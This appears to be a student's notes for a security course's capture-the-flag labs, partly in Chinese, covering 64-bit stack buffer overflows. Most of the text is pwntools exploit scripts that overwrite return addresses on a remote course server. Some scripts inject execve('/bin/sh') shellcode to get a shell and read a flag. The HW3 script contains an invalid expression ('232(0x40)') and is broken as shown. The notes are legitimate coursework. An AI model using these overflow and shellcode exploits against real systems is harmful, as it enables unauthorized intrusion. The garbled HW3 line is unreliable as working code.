> # Week11 & 12 11/26 & 12/3
## `Lab 1`
### Buffer Overflow

> * 
> * 一開始檢查是什麼檔案,是64bits
> * 看到城市寫bof,應該是buffer overflow 問題
> * 因為bof後會影響instruction pointer位置,導致error
> * 就嘗試了重複輸入'A'測試到什麼程度程式input會overflow
> * 
> * 
> * 找到24,也加了BBB證實ip有424242 bof
> * 現在要位移24個位子,把instruction point到我們要的address
> * 要找的是shell address,適用Python後即進入shell,然後看到有個flag檔,cat flag即拿到flag
> * 
> * 
> * 
> * `from pwn import *
#r=process('./lab1')
r = remote('140.134.25.138',20001)
r.recvline()
input()
#r.recvuntil('Your first challenge for bof')
r.send(b'a' * 24 + p64(0x400638))
r.send("cat flag")
#print (p64(0x400638))
r.interactive()
`
> * 參考影片https://www.youtube.com/watch?v=YVlTDPhTA9U&ab_channel=JohnHammond
## `Lab 2`
### Shellcode

> from pwn import *
> #r=process('./lab2')
> r=remote('140.134.25.138',20002)
> context.arch='amd64'
> #code=shellcraft.sh()
> #asm_code=asm(code)
> code='''
> mov rbx, 0x68732f6e69622f
> push rbx
> mov rdi, rsp
> mov rsi, 0x0
> mov rdx, 0x0
> mov rax, 0x3b
> syscall
> '''
> print(code)
> asm_code=asm(code)
> print(len(asm_code))
> r.send(asm_code)
> r.sendline(b'a'*24+p64(0x601060))
> r.interactive()
> * 
## `HW1`
###

> from pwn import *
>
> r=remote('140.134.25.138',25000)
> #r.recvline()
> r.send(b'a'*40 + p64(0x400778))
> r.send(b'a'*28 + p64(0))
> r.interactive()
> 
## `HW2`
###
> 
## `HW3`
###
from pwn import *
#r = process('./hw3')
r = remote('140.134.25.138',25002)
input()
context.arch = 'amd64'
code = shellcraft.sh()
asm_code = asm(code)
r.send(b'a' * 28 + 232(0x40) + b'a' * 8 + p64(0x6010a0))
r.send(asm_code)
r.interactive()
{"metaMigratedAt":"2023-06-15T17:18:06.226Z","metaMigratedFrom":"Content","title":"Week11 & 12 11/26 & 12/3","breaks":true,"contributors":"[{\"id\":\"a588dd8e-db19-4d00-bda1-0d4b0d40d4ff\",\"add\":4035,\"del\":1999}]"}
Lab 1
Buffer Overflow
Lab 2
Shellcode
HW1
HW2
HW3